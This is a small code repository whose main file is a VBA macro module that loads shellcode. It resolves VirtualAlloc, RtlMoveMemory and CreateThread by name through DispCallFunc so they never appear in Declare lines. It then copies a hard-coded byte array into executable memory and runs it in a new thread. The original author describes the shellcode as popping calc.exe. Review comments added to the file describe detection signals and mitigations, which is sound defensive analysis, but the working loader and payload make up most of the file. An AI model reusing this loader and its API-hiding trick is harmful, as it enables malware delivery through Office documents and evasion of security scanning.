├── FunctionPointers.bas
├── README.md
└── VBAFunctionPointers.jpg

/FunctionPointers.bas:
--------------------------------------------------------------------------------
Attribute VB_Name = "Module1"
' Reviewer summary (defensive reading of this module):
' The module places a byte array in executable memory and starts a thread on it,
' using only three declared imports. Every other Win32 function is resolved by
' name at run time and invoked through DispCallFunc, so "VirtualAlloc",
' "RtlMoveMemory" and "CreateThread" appear in this file only as string literals,
' never in a Declare statement. Macro triage that only lists Declare lines will
' miss them; the pairing of DispCallFunc with LoadLibrary/GetProcAddress is the
' signal to look for instead.
' Preventive controls that apply to this pattern: blocking macros in documents
' that carry the Mark of the Web, and the Microsoft Defender attack surface
' reduction rule "Block Win32 API calls from Office macros".

' DispCallFunc (OleAut32.dll): called below with pvInstance = 0 and a raw function
' address in the offsetinVft parameter.
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
' LoadLibraryA / GetProcAddress (kernel32): used by stdCallA to turn a DLL name and
' an export name into an address.
' NOTE(review): the declarations are marked PtrSafe, yet module handles and
' addresses are carried in 32-bit Long values throughout this file.
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

' Calling-convention value handed to DispCallFunc as its CallConv argument.
Const CC_STDCALL = 4
' Allocation type and page protection passed to VirtualAlloc in Sheldon. A
' read/write/execute private allocation made by an Office process is a common
' EDR detection signal.
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

' Module-level scratch arrays filled by stdCallA: one VarType and one VarPtr per
' argument. They hold 64 slots and stdCallA does not check the argument count
' against that limit.
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long

'Credits
'http://exceldevelopmentplatform.blogspot.com/2017/05/dispcallfunc-opens-new-door-to-com.html
'http://www.freevbcode.com/ShowCode.asp?ID=1863

' Sheldon: allocates a memory region, copies the ShellCode array into it one byte
' at a time, then starts a thread whose start address is that region.
' ShellCode, iArray and bytestowrite are never declared, so they are implicit
' Variants (no Option Explicit is visible in this listing).
' Behavioural indicators for this routine: an Office process that allocates
' read/write/execute memory and then creates a thread starting inside that
' private, non-image region.
Sub Sheldon()

    Dim lpMemory As Long
    Dim lResult As Long

    ' The next comment is the original author's description of the payload; nothing
    ' in this file verifies it.
    ' NOTE(review): &HD9 &H74 &H24 &HF4 near the start looks like the x86 FNSTENV
    ' get-PC idiom used by self-decoding stubs - treat the bytes as opaque and
    ' confirm behaviour in an isolated sandbox rather than trusting the comment.
    'Shellcode pops calc.exe
    ShellCode = Array(Chr(&HDA), Chr(&HD5), Chr(&HB8), Chr(&H2E), Chr(&H72), Chr(&H68), Chr(&H42), Chr(&HD9), Chr(&H74), Chr(&H24), Chr(&HF4), Chr(&H5B), Chr(&H31), Chr(&HC9), Chr(&HB1), _
    Chr(&H31), Chr(&H83), Chr(&HEB), Chr(&HFC), Chr(&H31), Chr(&H43), Chr(&H14), Chr(&H3), Chr(&H43), Chr(&H3A), Chr(&H90), Chr(&H9D), Chr(&HBE), Chr(&HAA), Chr(&HD6), _
    Chr(&H5E), Chr(&H3F), Chr(&H2A), Chr(&HB7), Chr(&HD7), Chr(&HDA), Chr(&H1B), Chr(&HF7), Chr(&H8C), Chr(&HAF), Chr(&HB), Chr(&HC7), Chr(&HC7), Chr(&HE2), Chr(&HA7), _
    Chr(&HAC), Chr(&H8A), Chr(&H16), Chr(&H3C), Chr(&HC0), Chr(&H2), Chr(&H18), Chr(&HF5), Chr(&H6F), Chr(&H75), Chr(&H17), Chr(&H6), Chr(&HC3), Chr(&H45), Chr(&H36), _
    Chr(&H84), Chr(&H1E), Chr(&H9A), Chr(&H98), Chr(&HB5), Chr(&HD0), Chr(&HEF), Chr(&HD9), Chr(&HF2), Chr(&HD), Chr(&H1D), Chr(&H8B), Chr(&HAB), Chr(&H5A), Chr(&HB0), _
    Chr(&H3C), Chr(&HD8), Chr(&H17), Chr(&H9), Chr(&HB6), Chr(&H92), Chr(&HB6), Chr(&H9), Chr(&H2B), Chr(&H62), Chr(&HB8), Chr(&H38), Chr(&HFA), Chr(&HF9), Chr(&HE3), _
    Chr(&H9A), Chr(&HFC), Chr(&H2E), Chr(&H98), Chr(&H92), Chr(&HE6), Chr(&H33), Chr(&HA5), Chr(&H6D), Chr(&H9C), Chr(&H87), Chr(&H51), Chr(&H6C), Chr(&H74), Chr(&HD6), _
    Chr(&H9A), Chr(&HC3), Chr(&HB9), Chr(&HD7), Chr(&H68), Chr(&H1D), Chr(&HFD), Chr(&HDF), Chr(&H92), Chr(&H68), Chr(&HF7), Chr(&H1C), Chr(&H2E), Chr(&H6B), Chr(&HCC), _
    Chr(&H5F), Chr(&HF4), Chr(&HFE), Chr(&HD7), Chr(&HC7), Chr(&H7F), Chr(&H58), Chr(&H3C), Chr(&HF6), Chr(&HAC), Chr(&H3F), Chr(&HB7), Chr(&HF4), Chr(&H19), Chr(&H4B), _
    Chr(&H9F), Chr(&H18), Chr(&H9F), Chr(&H98), Chr(&HAB), Chr(&H24), Chr(&H14), Chr(&H1F), Chr(&H7C), Chr(&HAD), Chr(&H6E), Chr(&H4), Chr(&H58), Chr(&HF6), Chr(&H35), _
    Chr(&H25), Chr(&HF9), Chr(&H52), Chr(&H9B), Chr(&H5A), Chr(&H19), Chr(&H3D), Chr(&H44), Chr(&HFF), Chr(&H51), Chr(&HD3), Chr(&H91), Chr(&H72), Chr(&H38), Chr(&HB9), _
    Chr(&H64), Chr(&H0), Chr(&H46), Chr(&H8F), Chr(&H67), Chr(&H1A), Chr(&H49), Chr(&HBF), Chr(&HF), Chr(&H2B), Chr(&HC2), Chr(&H50), Chr(&H57), Chr(&HB4), Chr(&H1), _
    Chr(&H15), Chr(&HA7), Chr(&HFE), Chr(&H8), Chr(&H3F), Chr(&H20), Chr(&HA7), Chr(&HD8), Chr(&H2), Chr(&H2D), Chr(&H58), Chr(&H37), Chr(&H40), Chr(&H48), Chr(&HDB), _
    Chr(&HB2), Chr(&H38), Chr(&HAF), Chr(&HC3), Chr(&HB6), Chr(&H3D), Chr(&HEB), Chr(&H43), Chr(&H2A), Chr(&H4F), Chr(&H64), Chr(&H26), Chr(&H4C), Chr(&HFC), Chr(&H85), _
    Chr(&H63), Chr(&H2F), Chr(&H63), Chr(&H16), Chr(&HEF), Chr(&H9E), Chr(&H6), Chr(&H9E), Chr(&H8A), Chr(&HDE))

    ' Allocation request: MEM_COMMIT with PAGE_EXECUTE_READWRITE, size taken from
    ' UBound(ShellCode). The returned address is kept in a 32-bit Long.
    lpMemory = stdCallA("kernel32", "VirtualAlloc", vbLong, 0&, UBound(ShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)

    ' One RtlMoveMemory call per array element. Each element is a one-character
    ' String; stdCallA converts String arguments with StrConv(vbFromUnicode) and
    ' passes their StrPtr, so the call receives a pointer, not the value.
    For iArray = LBound(ShellCode) To UBound(ShellCode)
        bytestowrite = ShellCode(iArray)
        lResult = stdCallA("kernel32", "RtlMoveMemory", vbLong, lpMemory + iArray, bytestowrite, 1)
    Next iArray

    ' Thread start address is the allocated region. The value stored in lResult is
    ' not used afterwards.
    lResult = stdCallA("kernel32", "CreateThread", vbLong, 0&, 0&, lpMemory, 0&, 0&, 0&)

End Sub

' stdCallA: generic late-bound caller. Resolves sFunc in sDll with
' LoadLibrary/GetProcAddress and invokes it through DispCallFunc using CC_STDCALL.
'   sDll    - library name handed to LoadLibrary
'   sFunc   - export name handed to GetProcAddress
'   RetType - VbVarType forwarded as DispCallFunc's retTYP argument
'   P()     - arguments for the target function, in order
' The function's own name is passed as DispCallFunc's ByRef retVAR argument, so
' the call result becomes the return value.
' Neither the LoadLibrary/GetProcAddress results nor HRes are checked.
' Defensive relevance: any export of any DLL can be reached through this helper
' without a matching Declare line, so reviewers need to trace the string
' arguments at each call site to learn which APIs a macro really uses.
Public Function stdCallA(sDll As String, sFunc As String, ByVal RetType As VbVarType, ParamArray P() As Variant)

    ' pFunc is declared but never used in this function.
    Dim i As Long, pFunc As Long, V(), HRes As Long
    ReDim V(0)

    ' Replaces the one-element array from ReDim with a copy of the arguments.
    V = P

    For i = 0 To UBound(V)
        ' String arguments are converted from Unicode in place and V(i) is replaced
        ' by the StrPtr of the converted string.
        If VarType(P(i)) = vbString Then P(i) = StrConv(P(i), vbFromUnicode): V(i) = StrPtr(P(i))
        ' Record each argument's type and the address of its Variant in the
        ' module-level arrays that DispCallFunc receives by reference.
        VType(i) = VarType(V(i))
        VPtr(i) = VarPtr(V(i))
    Next i

    ' After the loop i equals the number of arguments and is passed as paCNT.
    HRes = DispCallFunc(0, GetProcAddress(LoadLibrary(sDll), sFunc), CC_STDCALL, RetType, i, VType(0), VPtr(0), stdCallA)

End Function

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# VBAFunctionPointers
--------------------------------------------------------------------------------
/VBAFunctionPointers.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rmdavy/VBAFunctionPointers/403c4b9aa12855fbdddf9bfb2ea357bf5b9dfb37/VBAFunctionPointers.jpg
--------------------------------------------------------------------------------